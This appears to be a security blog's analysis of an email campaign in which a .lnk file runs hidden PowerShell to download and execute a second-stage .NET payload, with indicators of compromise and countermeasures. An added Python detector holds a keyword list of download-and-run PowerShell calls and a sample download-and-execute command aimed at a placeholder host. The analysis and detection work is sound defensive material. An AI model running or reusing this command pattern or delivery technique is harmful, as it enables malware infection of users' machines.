Malware Employs PowerShell to Infect Systems

Email is one of the favorite methods used by attackers to infect systems. The malware used in email campaigns is often ransomware or banking malware.

We have recently seen some interesting tactical changes, including:

  • Attachments with the malicious executable inside.
  • Microsoft Office documents that contain a malicious macro. The macro will download ransomware or banking malware after execution.
  • JavaScript files, executed by Wscript in Windows, dropping, for example, Locky ransomware.

We analyzed one recent email campaign with an attached .rar file. Inside this file, we found a .lnk file, which after executing uses PowerShell to download a second stage of malware.

Let’s take a look at the .lnk file:

.lnk file characteristics.

While investigating the file we saw this command:

PowerShell execution.

This command executes if the file is run:

Command execution.

The .lnk file performs the following:

  • Opens a hidden window.
  • Downloads a file from the domain http://anonfile[.]xyz/f/7f58d7dddec4b72bab0fb27cd852593e[.]exe
  • Saves the file in the %TEMP% folder as “windows.scr.”
  • Executes the downloaded file.
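As an added example that is not part of the original analysis, the following Python parses the Windows Shell Link (.lnk) binary format far enough to pull out the COMMAND_LINE_ARGUMENTS field and then flags argument strings that show the four behaviours listed above (hidden window, download, drop in %TEMP%, execute). The .lnk bytes and the argument string are constructed fixtures; the domain example.invalid is a placeholder.

```python
import struct

# LinkFlags bits from the MS-SHLLINK header (offset 0x14); the header itself is 0x4C bytes.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
HEADER_SIZE = 0x4C

def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields (name, relative_path, working_dir, arguments, icon)."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link header")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # skip LinkTargetIDList: 2-byte IDListSize + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # skip LinkInfo: 4-byte LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {}
    for key, flag in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon", HAS_ICON_LOCATION)):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, then the string
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        out[key] = raw.decode("utf-16-le") if width == 2 else raw.decode("latin-1")
        pos += width * count
    return out

# Substrings that correspond to the behaviours described in the analysis above.
INDICATORS = {
    "hidden_window": ("-windowstyle hidden", "-w hidden"),
    "download": ("downloadfile", "downloadstring", "net.webclient", "invoke-webrequest"),
    "temp_drop": ("%temp%", "$env:temp"),
    "execute": ("start-process", "invoke-item", "invoke-expression"),
}

def suspicious_lnk_indicators(data: bytes) -> list:
    """Names of the indicator groups matched by the .lnk's PowerShell arguments."""
    args = parse_lnk_strings(data).get("arguments", "").lower()
    return [name for name, needles in INDICATORS.items() if any(n in args for n in needles)]

def build_sample_lnk(arguments: str) -> bytes:
    """Constructed fixture: minimal Unicode .lnk carrying only a COMMAND_LINE_ARGUMENTS field."""
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I", header, 0, HEADER_SIZE)
    header[4:20] = bytes.fromhex("0114020000000000c000000000000046")  # LinkCLSID, little-endian
    struct.pack_into("<I", header, 0x14, HAS_ARGUMENTS | IS_UNICODE)
    return bytes(header) + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")

# Constructed argument string mirroring the behaviour described above (placeholder domain).
SAMPLE_ARGS = ("-WindowStyle Hidden -Command \"(New-Object Net.WebClient).DownloadFile("
               "'http://example.invalid/payload.exe', $env:TEMP + '\\windows.scr'); "
               "Start-Process ($env:TEMP + '\\windows.scr')\"")
```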

It’s possible to retrieve the file directly:

Retrieving the file without executing the .lnk file.


Analyzing the dropped malware 

Continuing with our analysis:

Executing the file.

The downloaded file, %TEMP%\Windows.src, is executed by cmd.exe.

During execution the malware makes some changes to the infected machine, and these changes survive a reboot. The persistence mechanism creates a scheduled task on the system using schtasks.

If we take a look at the binary we can extract its properties:

File properties.

The malware is protected by the .NET obfuscator Smart Assembly, which makes it difficult to reverse engineer the malware and to extract more information easily.

We can load the malware to see more properties:

Further file properties, showing obfuscated functions and methods.


PowerShell plus .lnk offers stealth on many sandbox systems

Some companies and security researchers use crawlers and other automated pipelines for malware analysis. We ran this sample in several popular sandboxes to observe its behavior. The analysis failed in some of them for a few reasons:

  • The sandbox did not have PowerShell, so the .lnk could not download the malware.
  • The .lnk failed when the sandbox tried to run it.
  • The sandbox did not support .lnk files.

Thus in a real environment a sandbox might fail to determine whether this file is malicious.

One example of an error during execution:

Windows error during execution.

The ideal scenario is to prepare the sandbox machine with PowerShell and ensure that it can execute .lnk files to see if they show malicious behavior.


Countermeasures

To protect an organization, several countermeasures are effective against this type of threat.

  • Modify the policy for execution in PowerShell, using the administrative templates.
  • Allow the execution only of signed PowerShell scripts.
  • Do not allow the saving of unknown .exe files in the %TEMP% folder.
  • Do not allow the execution of unknown .exe files.
  • Apply Windows restrictions such as AppLocker.

The idea is to capture some indicators of malicious activity performed on the infected machine and network to block the malware in your organization, and to combat similar future threats.

We found the malware connecting to IP address 174[.]127[.]99[.]183. This IP is located in the United States and shows other malicious activity, as we saw with VirusTotal:

VirusTotal results.

After your investigation, you can use the indicators of compromise you find and apply countermeasures.

Hashes used during this analysis:

  • 846e9c0631139cfdcbf270f8bdc08cdd39e9a89d
  • 6c41bf5ead73e98c56397c37114f2c5a46fd2640


2 comments on “Malware Employs PowerShell to Infect Systems”

  • Doesn't -ExecutionPolicy Bypass defeat these two suggestions?

    -Modify the policy for execution in PowerShell, using the administrative templates.
    -Allow the execution only of signed PowerShell scripts.

  • Outstanding paper. Have you ever seen malware with a more stealthy method that downloads the dropper over an HTTPS connection? Will it be able to bypass such Cisco devices as ScanSafe? In that case, what are the recommended tactics for us?

    Besides, can you share the VirusTotal inquiry script shown above? It's pretty neat and really useful for me. I already have my private API.
